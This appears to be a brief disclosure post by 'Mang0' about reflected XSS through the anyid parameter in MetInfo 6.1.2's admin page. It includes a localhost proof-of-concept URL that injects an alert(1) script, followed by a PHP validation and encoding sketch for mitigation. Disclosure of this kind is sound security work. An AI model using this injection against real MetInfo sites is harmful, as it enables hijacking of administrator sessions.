XSS in MetInfo V6.1.2


Explain

The vulnerability exists in the MetInfo6.1.2/admin/index.php page. The anyid parameter is not filtered adequately, which results in an XSS vulnerability.

Function

The affected page is located in the admin management directory: MetInfo6.1.2\admin\

Reproduction

Set up the website locally, then log in to the admin back end: http://localhost/MetInfo6.1.2/admin/. After logging in successfully, construct the payload:

XSS vulnerability exists

http://localhost:9096/MetInfo6.1.2/admin/index.php?lang=cn&anyid=47oaflb%3c%2fscript%3e%3cscript%3ealert(1)%3c%2fscript%3emwq3k&n=admin&c=admin_admin&a=doadd
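A mitigation sketch for the anyid handling described above, as an added example that is not MetInfo's own code. It assumes anyid is meant to be a numeric id and that it is echoed inside an inline script block, as the `</script>` in the payload suggests; `validate_anyid`, `js_literal` and `html_text` are hypothetical helper names.

```php
<?php
// Added example: hypothetical helpers, not taken from the MetInfo code base.
// Requires PHP >= 7.3 (JSON_THROW_ON_ERROR).

// Allow-list validation at the boundary.
// Assumption: anyid is a small numeric id, so anything else is rejected.
function validate_anyid($raw): ?int
{
    if (!is_string($raw) || !preg_match('/\A[0-9]{1,9}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Encoder for values written into a JavaScript context.
// JSON_HEX_TAG emits < and > as \u003C and \u003E, so the value
// cannot terminate the surrounding <script> element.
function js_literal($value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_THROW_ON_ERROR;
    return json_encode($value, $flags);
}

// Encoder for values written into HTML text or quoted attributes.
function html_text($value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: a plain id and the URL-decoded anyid value from the request above.
$samples = ['47', '47oaflb</script><script>alert(1)</script>mwq3k'];

foreach ($samples as $raw) {
    $id = validate_anyid($raw);
    if ($id === null) {
        // Rejected: never reaches the template. The two lines below only
        // show what each encoder would emit if the value had to be displayed.
        echo 'rejected (HTML context): ', html_text($raw), "\n";
        echo 'rejected (JS context):   var anyid = ', js_literal($raw), ";\n";
        continue;
    }
    echo 'accepted: <script>var anyid = ', js_literal($id), ";</script>\n";
}
```

Validation and output encoding are independent layers: the allow-list stops the request early, and the context-specific encoder keeps the page safe even where validation is missing.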


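Please credit the source when reposting. You are welcome to verify the sources cited in this article and to point out any errors or unclear wording. You can comment in the comment section below or e-mail 951207194@qq.com

Article title: XSS in MetInfo V6.1.2

Word count: 104

Author: Mang0

Published: 2018-10-16, 02:16:08

Last updated: 2018-11-02, 21:52:15

Original link: http://mang0.me/archis/a5c61176/

Copyright notice: "Attribution-NonCommercial-ShareAlike 4.0". Please keep the original link and author when reposting.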
